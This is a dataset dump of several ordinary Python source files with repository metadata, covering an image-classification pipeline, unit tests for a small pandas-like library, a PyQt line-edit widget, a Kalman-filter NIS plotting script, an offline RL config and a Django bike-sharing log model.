1
| 0
|
c94abc02ec26c5e120241965ee1760edb37aa362
| 909
|
py
|
Python
|
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | null | null | null |
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | 4
|
2021-07-02T17:49:44.000Z
|
2021-09-27T01:06:41.000Z
|
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | null | null | null |
import numpy as np
from .cnn import CNN
from .kviews import KViews
from .. import const
class EndToEnd():
    """End-to-end pipeline chaining a background CNN and a rough/smooth model.

    The background model labels each position of the prediction array; where
    cuticle is detected, the rough/smooth model refines those positions into
    labels 1 (rough) / 2 (smooth).
    """

    def __init__(
            self,
            bg_model: CNN,
            rs_model: KViews
    ) -> None:
        self.name = 'EndToEnd'
        self.bg_model = bg_model  # background vs. cuticle classifier
        self.rs_model = rs_model  # rough vs. smooth classifier

    def metadata(self):
        """Return the concatenated metadata of both sub-models."""
        return self.bg_model.metadata() + self.rs_model.metadata()

    def predict(self, image: np.ndarray) -> np.ndarray:
        """Predict labels for `image`: background predictions with cuticle
        positions remapped to rough/smooth labels by the second-stage model.
        """
        # first find background
        preds = self.bg_model.predict(image)
        cuticle = const.BG_LABEL_MAP['cuticle']
        # Bug fix: the original tested `preds.any() == cuticle`, which compares
        # a single boolean (True if ANY prediction is non-zero) against a label
        # value instead of checking whether any position carries the cuticle
        # label. The hard-coded `preds == 1` below it implied cuticle == 1;
        # both checks now use the named constant consistently.
        if (preds == cuticle).any():
            # cuticle detected, so use rs_model on just those positions
            idx = np.where(preds == cuticle)
            rs_preds = self.rs_model.predict(image[idx])
            # remap (0, 1) to (1, 2)
            mp = {0: 1, 1: 2}
            rs_preds = np.array([mp[i] for i in rs_preds])
            preds[idx] = rs_preds
        return preds
| 24.567568
| 66
| 0.567657
| 124
| 909
| 3.991935
| 0.379032
| 0.084848
| 0.088889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014587
| 0.321232
| 909
| 36
| 67
| 25.25
| 0.787682
| 0.085809
| 0
| 0
| 0
| 0
| 0.01816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.166667
| 0.041667
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c950e89a11e706b3a1a0ba3575143820351f7247
| 3,337
|
py
|
Python
|
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
import sys
import os

import upandas as upd

# Run a single Python script
# For many simple, single file projects, you may find it inconvenient
# to write a complete Dockerfile. In such cases, you can run a Python
# script by using the Python Docker image directly:
# versions to consider: 3 (600+ MB), slim (150 MB) alpine (90 MB)
# $ docker run -it --rm --name my-running-script -v "$PWD":/usr/src/myapp -w /usr/src/myapp python:3 python your-daemon-or-script.py
# $ docker run -it --rm -v "$PWD":/usr/src/upandas -w /usr/src/upandas python:alpine python upandas_test.py

if __name__ == '__main__':
    # First CLI argument selects how the tests are run.
    if len(sys.argv) < 2:
        print('no testing approach supplied, see...')
        sys.exit(1)
    env = sys.argv[1]
    if env == 'local':
        print('Testing locally')
    elif env == 'docker':
        # Re-run this script inside a slim Python container and forward
        # the container's exit status.
        print('Using docker to test')
        ex = os.system(
            'docker run -it --rm -v "$PWD":/usr/src/upandas -w /usr/src/upandas '
            'python:alpine python upandas_test.py local')
        sys.exit(os.WEXITSTATUS(ex))
    elif env == 'virtualenv':
        raise NotImplementedError
    else:
        print('Unsupported environment: {}'.format(env))
    sys.argv = sys.argv[:1]  # strip our settings out

import unittest
import math

skip_pandas_tests = True  # TODO: make this explicit in the sys.argv stuff above
try:
    import pandas as pd
    skip_pandas_tests = False
except ImportError:
    # Bug fix: a bare `except:` also swallowed SystemExit/KeyboardInterrupt;
    # only a missing pandas should disable the pandas comparison tests.
    pass
# Series methods
# ==============
class TestSeriesInit(unittest.TestCase):
    """Construction tests for upandas Series."""

    # dict, list, single value, another series, iterator
    def test_basic_init(self):
        cases = ([1, 2, 3], [4, 5, 6],
                 list(range(1000)), [1, None, 2, None], [])
        for data in cases:
            series = upd.Series(data)
            self.assertEqual(len(series), len(data))
            # test shapes: one-dimensional, tuple-typed, consistent with len()
            self.assertEqual(len(series), series.shape[0])
            self.assertEqual(len(series.shape), 1)
            self.assertEqual(type(series.shape), tuple)
            for position, element in enumerate(series):
                self.assertEqual(element, data[position])
            if not skip_pandas_tests:
                pass
                # TODO: add a function to compare pd.Series and upd.Series
                # spd = pd.Series(ds)
                # self.assertEqual([j for j in s], [j for j in spd])
class TestSeriesApply(unittest.TestCase):
    """Tests for Series.apply."""

    # TODO: args, kwargs?
    def test_apply(self):
        series = upd.Series([1, 2, 3])
        transformed = series.apply(lambda v: v**2 - 3)
        self.assertEqual(transformed.values, [-2, 1, 6])
class TestSeriesCopy(unittest.TestCase):
    """Tests for Series.copy semantics."""

    def test_copy(self):
        original = upd.Series([1, 2, 3])
        duplicate = original.copy()
        self.assertEqual(original.values, duplicate.values)
        duplicate[0] = 10
        # TODO: add comparisons of frames?
        self.assertNotEqual(original.values, duplicate.values)

    def test_deep_copy(self):
        # copy() is shallow: nested objects are shared between copies
        original = upd.Series([1, 2, {'foo': 'bar'}])
        duplicate = original.copy()
        duplicate[2]['foo'] = 'baz'
        self.assertEqual(original[2]['foo'], duplicate[2]['foo'])
class TestSeriesValues(unittest.TestCase):
    """Tests for the Series.values accessor."""

    def test_values(self):
        for data in ([1, 2, 3], [4, 5, 6],
                     list(range(1000)), [1, None, 2, None], []):
            self.assertEqual(upd.Series(data).values, data)
if __name__ == '__main__':
    # Run the unit tests (argv was trimmed above so unittest ignores our flags).
    unittest.main()
| 29.530973
| 132
| 0.574768
| 462
| 3,337
| 4.084416
| 0.361472
| 0.079491
| 0.026497
| 0.020668
| 0.189719
| 0.18336
| 0.18336
| 0.165342
| 0.165342
| 0.165342
| 0
| 0.024759
| 0.285886
| 3,337
| 112
| 133
| 29.794643
| 0.7671
| 0.264309
| 0
| 0.231884
| 0
| 0.014493
| 0.107598
| 0.009446
| 0
| 0
| 0
| 0.008929
| 0.144928
| 1
| 0.072464
| false
| 0.028986
| 0.072464
| 0
| 0.202899
| 0.057971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c953f88756774d3e9d070501efa3054134aaa4e2
| 6,555
|
py
|
Python
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 7
|
2019-05-01T01:34:36.000Z
|
2022-03-08T02:24:14.000Z
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 141
|
2019-04-16T11:22:01.000Z
|
2021-04-14T15:12:36.000Z
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 5
|
2019-04-17T11:48:19.000Z
|
2021-11-21T10:30:19.000Z
|
from __future__ import annotations
from typing import Literal
from prettyqt import constants, core, gui, widgets
from prettyqt.qt import QtCore, QtWidgets
from prettyqt.utils import InvalidParamError, bidict
# Two-way mapping between readable echo-mode names and Qt's EchoMode enum.
ECHO_MODE = bidict(
    normal=QtWidgets.QLineEdit.EchoMode.Normal,
    no_echo=QtWidgets.QLineEdit.EchoMode.NoEcho,
    password=QtWidgets.QLineEdit.EchoMode.Password,
    echo_on_edit=QtWidgets.QLineEdit.EchoMode.PasswordEchoOnEdit,
)

EchoModeStr = Literal["normal", "no_echo", "password", "echo_on_edit"]

# Two-way mapping between readable positions and Qt's ActionPosition enum.
ACTION_POSITION = bidict(
    leading=QtWidgets.QLineEdit.ActionPosition.LeadingPosition,
    trailing=QtWidgets.QLineEdit.ActionPosition.TrailingPosition,
)

ActionPositionStr = Literal["leading", "trailing"]

# Monkeypatch the Qt base class so LineEdit inherits the prettyqt
# widgets.Widget helpers through QLineEdit.
QtWidgets.QLineEdit.__bases__ = (widgets.Widget,)
class LineEdit(QtWidgets.QLineEdit):
    """QLineEdit subclass with snake_case helpers, extra signals and pickling.

    Adds focusLost / enterPressed / editComplete / value_changed signals,
    background coloring on failed validation, and __reduce__/__setstate__
    support for serialization via serialize_fields().
    """

    focusLost = core.Signal()
    enterPressed = core.Signal()
    editComplete = core.Signal(str)
    value_changed = core.Signal(str)  # re-emission of textChanged

    def __init__(
        self,
        default_value: str = "",
        read_only: bool = False,
        parent: QtWidgets.QWidget | None = None,
    ):
        super().__init__(default_value, parent)
        # Every text change re-checks validity (coloring) and forwards the
        # new text through value_changed.
        self.textChanged.connect(self._set_validation_color)
        self.textChanged.connect(self.value_changed)
        self.set_read_only(read_only)

    def __repr__(self):
        return f"{type(self).__name__}: {self.serialize_fields()}"

    def __setstate__(self, state):
        """Restore the widget from a dict produced by serialize_fields()."""
        super().__setstate__(state)
        self.set_text(state["text"])
        self.setValidator(state["validator"])
        self.setInputMask(state["input_mask"])
        self.setMaxLength(state["max_length"])
        self.setPlaceholderText(state["placeholder_text"])
        self.setReadOnly(state["read_only"])
        self.setFrame(state["has_frame"])
        self.setClearButtonEnabled(state["clear_button_enabled"])
        # self.setAlignment(state["alignment"])
        self.set_cursor_move_style(state["cursor_move_style"])
        self.set_echo_mode(state["echo_mode"])
        self.setCursorPosition(state["cursor_position"])
        self.setDragEnabled(state["drag_enabled"])
        self.setModified(state["is_modified"])

    def __reduce__(self):
        # Pickle as (class, no ctor args, state dict) — state is re-applied
        # via __setstate__.
        return type(self), (), self.__getstate__()

    def __add__(self, other: str):
        """`widget + "text"` appends text and returns the widget (fluent)."""
        self.append_text(other)
        return self

    def serialize_fields(self):
        """Collect the widget state restored by __setstate__."""
        return dict(
            text=self.text(),
            # alignment=self.alignment(),
            validator=self.validator(),
            max_length=self.maxLength(),
            read_only=self.isReadOnly(),
            input_mask=self.inputMask(),
            has_frame=self.hasFrame(),
            placeholder_text=self.placeholderText(),
            clear_button_enabled=self.isClearButtonEnabled(),
            cursor_move_style=self.get_cursor_move_style(),
            echo_mode=self.get_echo_mode(),
            cursor_position=self.cursorPosition(),
            drag_enabled=self.dragEnabled(),
            is_modified=self.isModified(),
        )

    def focusOutEvent(self, event):
        # Emit our signal first, then let Qt do its normal handling.
        self.focusLost.emit()
        return super().focusOutEvent(event)

    def keyPressEvent(self, event):
        # Emit enterPressed for both main-keyboard Return and keypad Enter.
        if event.key() in [QtCore.Qt.Key.Key_Enter, QtCore.Qt.Key.Key_Return]:
            self.enterPressed.emit()
        return super().keyPressEvent(event)

    def _on_edit_complete(self):
        # NOTE(review): not connected anywhere in this file — presumably
        # wired up by callers; confirm before removing.
        self.editComplete.emit(self.text())

    def font(self) -> gui.Font:
        """Return the widget font wrapped in the prettyqt gui.Font type."""
        return gui.Font(super().font())

    def append_text(self, text: str):
        self.set_text(self.text() + text)

    def set_text(self, text: str):
        self.setText(text)

    def set_read_only(self, value: bool = True):
        """Set text to read-only.

        Args:
            value: True, for read-only, otherwise False
        """
        self.setReadOnly(value)

    def set_regex_validator(self, regex: str, flags=0) -> gui.RegularExpressionValidator:
        """Install a regex validator on this widget and return it."""
        validator = gui.RegularExpressionValidator(self)
        validator.set_regex(regex, flags)
        self.set_validator(validator)
        return validator

    def set_range(self, lower: int | None, upper: int | None):
        """Restrict input to integers in [lower, upper] via an IntValidator."""
        val = gui.IntValidator()
        val.set_range(lower, upper)
        self.set_validator(val)

    def set_validator(self, validator: gui.Validator):
        self.setValidator(validator)
        # Immediately reflect validity of the current text.
        self._set_validation_color()

    def set_input_mask(self, mask: str):
        self.setInputMask(mask)

    def _set_validation_color(self, state: bool = True):
        # Orange background for invalid input, default background otherwise.
        # NOTE(review): `state` is unused; as a textChanged slot it actually
        # receives the new text, not a bool — confirm the annotation.
        color = "orange" if not self.is_valid() else None
        self.set_background_color(color)

    def set_echo_mode(self, mode: EchoModeStr):
        """Set echo mode.

        Args:
            mode: echo mode to use

        Raises:
            InvalidParamError: invalid echo mode
        """
        if mode not in ECHO_MODE:
            raise InvalidParamError(mode, ECHO_MODE)
        self.setEchoMode(ECHO_MODE[mode])

    def get_echo_mode(self) -> EchoModeStr:
        """Return echo mode.

        Returns:
            echo mode
        """
        return ECHO_MODE.inverse[self.echoMode()]

    def set_cursor_move_style(self, style: constants.CursorMoveStyleStr):
        """Set cursor move style.

        Args:
            style: cursor move style to use

        Raises:
            InvalidParamError: invalid cursor move style
        """
        if style not in constants.CURSOR_MOVE_STYLE:
            raise InvalidParamError(style, constants.CURSOR_MOVE_STYLE)
        self.setCursorMoveStyle(constants.CURSOR_MOVE_STYLE[style])

    def get_cursor_move_style(self) -> constants.CursorMoveStyleStr:
        """Return cursor move style.

        Returns:
            cursor move style
        """
        return constants.CURSOR_MOVE_STYLE.inverse[self.cursorMoveStyle()]

    def add_action(
        self, action: QtWidgets.QAction, position: ActionPositionStr = "trailing"
    ):
        """Add an action icon at the leading or trailing edge of the field."""
        self.addAction(action, ACTION_POSITION[position])

    def set_value(self, value: str):
        self.setText(value)

    def get_value(self) -> str:
        return self.text()

    def is_valid(self) -> bool:
        """Whether the current text satisfies validator and input mask."""
        return self.hasAcceptableInput()
if __name__ == "__main__":
app = widgets.app()
widget = LineEdit()
action = widgets.Action(text="hallo", icon="mdi.folder")
widget.add_action(action)
widget.setPlaceholderText("test")
widget.setClearButtonEnabled(True)
# widget.set_regex_validator("[0-9]+")
widget.setFont(gui.Font("Consolas"))
widget.show()
app.main_loop()
| 31.066351
| 89
| 0.653547
| 725
| 6,555
| 5.673103
| 0.242759
| 0.031121
| 0.054705
| 0.023098
| 0.026258
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000599
| 0.236156
| 6,555
| 210
| 90
| 31.214286
| 0.820851
| 0.076888
| 0
| 0.014599
| 0
| 0
| 0.05046
| 0.008012
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189781
| false
| 0.021898
| 0.036496
| 0.043796
| 0.350365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95465582eabaa7004deb1d71c383aba26908941
| 1,086
|
py
|
Python
|
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt

"""
A chi square (X2) statistic is used to investigate whether distributions
of categorical variables differ from one another. Here we consider 3 degrees
of freedom for our system. Plotted against 95% line"""


def read_nis_values(path):
    """Read one NIS value per line from `path` and return them as floats.

    Bug fix: the original kept the values as strings, which makes matplotlib
    plot them as categorical data instead of numbers; converting to float
    places them on the same numeric axis as the 7.815 reference line.
    Blank lines are skipped.
    """
    with open(path) as f:
        return [float(line) for line in f if line.strip()]


lidar_nis = read_nis_values('NISvals_laser.txt')
print("Number of LIDAR Measurements :\t", len(lidar_nis))

radar_nis = read_nis_values('NISvals_radar.txt')
print("Number of RADAR Measurements :\t", len(radar_nis))

# 7.815 is the chi-square 95% threshold for 3 degrees of freedom.
k = [7.815] * len(lidar_nis)

# We skip the first row to cut out the unrealistically high NIS value
# from the first measurement. The Kalman filter has not found its groove yet.
lidar_nis = lidar_nis[1:]
radar_nis = radar_nis[1:]

plt.plot(lidar_nis)
plt.plot(k)
plt.title("LIDAR NIS")
plt.xlabel("Measurement Instance")
plt.ylabel("NIS")
plt.show()

plt.plot(radar_nis)
plt.plot(k)
plt.title("RADAR NIS")
plt.xlabel("Measurement Instance")
plt.ylabel("NIS")
plt.ylim(0, 20)
plt.show()
| 24.681818
| 78
| 0.721915
| 181
| 1,086
| 4.248619
| 0.475138
| 0.083225
| 0.028609
| 0.046814
| 0.291287
| 0.291287
| 0.241873
| 0.119636
| 0.119636
| 0
| 0
| 0.014161
| 0.154696
| 1,086
| 43
| 79
| 25.255814
| 0.823529
| 0.133518
| 0
| 0.37037
| 0
| 0
| 0.221918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95546315e55dfb705f35c46c08aaa6f9bae96a5
| 695
|
py
|
Python
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 50
|
2021-02-07T08:10:28.000Z
|
2022-03-25T09:10:26.000Z
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 7
|
2021-07-29T14:58:31.000Z
|
2022-02-01T08:02:54.000Z
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 4
|
2021-04-01T16:30:15.000Z
|
2022-03-31T17:38:05.000Z
|
import torch
from offlinerl.utils.exp import select_free_cuda

# --- task selection ---
task = "Hopper-v3"
task_data_type = "low"
task_train_num = 99
seed = 42

# Pick a free CUDA device when one is available, otherwise fall back to CPU.
device = 'cuda'+":"+str(select_free_cuda()) if torch.cuda.is_available() else 'cpu'
# Presumably populated at runtime from the environment/dataset — TODO confirm.
obs_shape = None
act_shape = None
max_action = None

# --- network hyper-parameters ---
hidden_features = 256
hidden_layers = 2
atoms = 21  # NOTE(review): presumably distributional-critic atom count — confirm

# --- CRR algorithm hyper-parameters ---
advantage_mode = 'mean'
weight_mode = 'exp'
advantage_samples = 4
beta = 1.0
gamma = 0.99

# --- training schedule ---
batch_size = 1024
steps_per_epoch = 1000
max_epoch = 200
lr = 1e-4
update_frequency = 100

# tune: continuous search space for hyper-parameter tuning
params_tune = {
    "beta" : {"type" : "continuous", "value": [0.0, 10.0]},
}
# tune: discrete grid search space
grid_tune = {
    "advantage_mode" : ['mean', 'max'],
    "weight_mode" : ['exp', 'binary'],
}
| 16.547619
| 83
| 0.680576
| 106
| 695
| 4.216981
| 0.660377
| 0.044743
| 0.06264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066087
| 0.172662
| 695
| 41
| 84
| 16.95122
| 0.711304
| 0.011511
| 0
| 0
| 0
| 0
| 0.132847
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9555f153510ab57941a2d63dc997b5c2a9d5575
| 8,325
|
py
|
Python
|
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
from django.contrib.admin.options import get_content_type_for_model
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.urls import reverse
from django.utils.html import format_html
from django.utils.translation import gettext_lazy as _
# log texts that only contain {object}
LOG_TEXTS_BASIC = {
    "cykel.bike.rent.unlock": _("{object} has been unlocked"),
    "cykel.bike.rent.longterm": _("{object} has been running for a long time"),
    "cykel.bike.forsaken": _("{object} had no rent in some time"),
    "cykel.bike.missing_reporting": _("{object} (missing) reported its status again!"),
    "cykel.tracker.missing_reporting": _(
        "{object} (missing) reported its status again!"
    ),
    "cykel.tracker.missed_checkin": _("{object} missed its periodic checkin"),
}

# log texts with extra placeholders ({station}, {location}, {rent}, {bike},
# {voltage}) that CykelLogEntry.display() fills in from the entry's JSON data
LOG_TEXTS = {
    "cykel.bike.rent.finished.station": _(
        "{object} finished rent at Station {station} with rent {rent}"
    ),
    "cykel.bike.rent.finished.freefloat": _(
        "{object} finished rent freefloating at {location} with rent {rent}"
    ),
    "cykel.bike.rent.started.station": _(
        "{object} began rent at Station {station} with rent {rent}"
    ),
    "cykel.bike.rent.started.freefloat": _(
        "{object} began rent freefloating at {location} with rent {rent}"
    ),
    "cykel.bike.tracker.battery.critical": _(
        "{object} (on Bike {bike}) had critical battery voltage {voltage} V"
    ),
    "cykel.bike.tracker.battery.warning": _(
        "{object} (on Bike {bike}) had low battery voltage {voltage} V"
    ),
    "cykel.tracker.battery.critical": _(
        "{object} had critical battery voltage {voltage} V"
    ),
    "cykel.tracker.battery.warning": _("{object} had low battery voltage {voltage} V"),
    "cykel.bike.tracker.missed_checkin": _(
        "{object} (on Bike {bike}) missed its periodic checkin"
    ),
}
class CykelLogEntry(models.Model):
    """Append-only log entry attached to an arbitrary model instance.

    Entries reference their subject via a generic foreign key and carry a
    dotted `action_type` plus a free-form JSON `data` payload that is used
    to render a human-readable message (see `display`).
    """

    # Generic foreign key to the object the entry is about.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField(db_index=True)
    content_object = GenericForeignKey("content_type", "object_id")
    # Set once on creation; entries are listed newest-first (see Meta).
    timestamp = models.DateTimeField(auto_now_add=True, db_index=True)
    # Dotted event identifier, e.g. "cykel.bike.rent.started.station".
    action_type = models.CharField(max_length=200)
    # Extra context (ids, voltage, ...) consumed by display().
    data = models.JSONField(default=dict)

    class Meta:
        ordering = ("-timestamp",)
        verbose_name = "Log Entry"
        verbose_name_plural = "Log Entries"

    def delete(self, using=None, keep_parents=False):
        """Refuse deletion: the log is append-only."""
        raise TypeError("Logs cannot be deleted.")

    def __str__(self):
        return (
            f"CykelLogEntry(content_object={self.content_object}, "
            + f"action_type={self.action_type}, timestamp={self.timestamp})"
        )

    @staticmethod
    def create_unless_time(timefilter, **kwargs):
        """Create an entry unless an equal one exists since `timefilter`.

        Deduplicates on (content_object, action_type): if a matching entry
        with timestamp >= `timefilter` already exists, nothing is created.
        """
        obj = kwargs["content_object"]
        action_type = kwargs["action_type"]
        if not CykelLogEntry.objects.filter(
            content_type=get_content_type_for_model(obj),
            object_id=obj.pk,
            action_type=action_type,
            timestamp__gte=timefilter,
        ).exists():
            CykelLogEntry.objects.create(**kwargs)

    def display_object(self):
        """Return an HTML admin-change-page link for the related object.

        Falls back to plain text if no link data was built, and to "" when
        the related object was deleted or is of an unhandled type.
        """
        # Local import — presumably avoids a circular import; confirm.
        from bikesharing.models import Bike, LocationTracker, Rent

        try:
            co = self.content_object
        except ObjectDoesNotExist:
            # The referenced object has been deleted.
            return ""
        text = None
        data = None
        if isinstance(co, Bike):
            text = _("Bike {ref}")
            data = {
                "url": reverse(
                    "admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
                    args=[co.id],
                ),
                "ref": co.bike_number,
            }
        if isinstance(co, LocationTracker):
            text = _("Tracker {ref}")
            data = {
                "url": reverse(
                    "admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
                    args=[co.id],
                ),
                "ref": co.device_id,
            }
        if isinstance(co, Rent):
            text = _("Rent {ref}")
            data = {
                "url": reverse(
                    "admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
                    args=[co.id],
                ),
                "ref": co.id,
            }
        if text and data:
            # format_html escapes interpolated values, keeping refs HTML-safe.
            data["ref"] = format_html('<a href="{url}">{ref}</a>', **data)
            return format_html(text, **data)
        elif text:
            return text
        return ""

    def display(self):
        """Render the entry as a translated, HTML-safe message.

        Falls back to the raw `action_type` when no template is known.
        """
        # Local import — presumably avoids a circular import; confirm.
        from bikesharing.models import Bike, Location, Station

        if self.action_type in LOG_TEXTS_BASIC:
            return format_html(
                LOG_TEXTS_BASIC[self.action_type], object=self.display_object()
            )
        if self.action_type in LOG_TEXTS:
            fmt = LOG_TEXTS[self.action_type]
            data = {"object": self.display_object()}
            # Battery events: include the reported voltage if present.
            if self.action_type.startswith(
                "cykel.bike.tracker.battery."
            ) or self.action_type.startswith("cykel.tracker.battery."):
                voltage = self.data.get("voltage")
                if voltage:
                    data["voltage"] = voltage
                else:
                    data["voltage"] = "[unknown]"
            # Tracker-on-bike events: link to the bike if it still exists.
            if self.action_type.startswith("cykel.bike.tracker."):
                bike_id = self.data.get("bike_id")
                if bike_id:
                    try:
                        bike = Bike.objects.get(pk=bike_id)
                        ref = bike.bike_number
                    except ObjectDoesNotExist:
                        # Bike gone: show the raw id instead of its number.
                        ref = bike_id
                    bike_url = reverse("admin:bikesharing_bike_change", args=[bike_id])
                    data["bike"] = format_html(
                        '<a href="{url}">{ref}</a>', url=bike_url, ref=ref
                    )
                else:
                    data["bike"] = "[unknown]"
            # Rent events: link to the rent record.
            if self.action_type.startswith("cykel.bike.rent."):
                rent_id = self.data.get("rent_id")
                if rent_id:
                    rent_url = reverse("admin:bikesharing_rent_change", args=[rent_id])
                    data["rent"] = format_html(
                        '<a href="{url}">{ref}</a>', url=rent_url, ref=rent_id
                    )
                else:
                    data["rent"] = "[unknown]"
            # Station-based rent events: link to the station.
            if self.action_type.startswith(
                "cykel.bike.rent."
            ) and self.action_type.endswith(".station"):
                station_id = self.data.get("station_id")
                if station_id:
                    try:
                        station = Station.objects.get(pk=station_id)
                        ref = station.station_name
                    except ObjectDoesNotExist:
                        ref = station_id
                    station_url = reverse(
                        "admin:bikesharing_station_change", args=[station_id]
                    )
                    data["station"] = format_html(
                        '<a href="{url}">{ref}</a>', url=station_url, ref=ref
                    )
                else:
                    data["station"] = "[unknown]"
            # Free-floating rent events: link to the recorded location.
            if self.action_type.startswith(
                "cykel.bike.rent."
            ) and self.action_type.endswith(".freefloat"):
                location_id = self.data.get("location_id")
                if location_id:
                    try:
                        loc = Location.objects.get(pk=location_id)
                        ref = "{}, {}".format(loc.geo.y, loc.geo.x)
                    except ObjectDoesNotExist:
                        ref = location_id
                    location_url = reverse(
                        "admin:bikesharing_location_change", args=[location_id]
                    )
                    data["location"] = format_html(
                        '<a href="{url}">{ref}</a>', url=location_url, ref=ref
                    )
                else:
                    data["location"] = "[unknown]"
            return format_html(fmt, **data)
        return self.action_type
| 37.669683
| 87
| 0.538498
| 862
| 8,325
| 5.011601
| 0.194896
| 0.046296
| 0.04537
| 0.025926
| 0.338194
| 0.302083
| 0.28588
| 0.223843
| 0.165278
| 0.13287
| 0
| 0.00055
| 0.344505
| 8,325
| 220
| 88
| 37.840909
| 0.791094
| 0.004324
| 0
| 0.227979
| 0
| 0
| 0.247013
| 0.098347
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025907
| false
| 0
| 0.051813
| 0.005181
| 0.160622
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9565831d1ae75fe2b15d03a39a78761d5e269d5
| 7,991
|
py
|
Python
|
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
